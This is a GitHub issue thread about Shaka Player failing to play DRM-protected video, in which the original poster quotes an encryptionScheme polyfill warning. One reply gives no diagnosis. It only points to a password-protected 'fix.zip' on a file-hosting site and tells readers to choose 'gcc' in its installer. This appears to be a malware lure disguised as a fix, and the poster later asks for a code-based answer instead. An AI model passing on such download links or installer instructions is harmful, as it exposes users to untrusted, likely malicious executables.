### ISSUE TITLE
Not Able to play DRM protected video 

### ISSUE THREAD

**Issue by BrajeshKumar007** [shaka-project/shaka-player#7221]
**Have you read the [Tutorials](http://shaka-player-demo.appspot.com/docs/api/tutorial-welcome.html)?**
yes

**Have you read the [FAQ](https://bit.ly/ShakaFAQ) and checked for duplicate open issues?**
yes 

**If the question is related to FairPlay, have you read the tutorial?**

yes
**What version of Shaka Player are you using?**

4.10.9
**What browser and OS are you using?**

browser
**Please ask your question**
while playing some of the video part is downloade but not able to play,i am getting this type of error "McEncryptionSchemePolyfill: No native encryptionScheme support found. Patching encryptionScheme support."

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BrajeshKumar007** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

not able to download

**Comment by BrajeshKumar007** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

Please recommend code related solution.
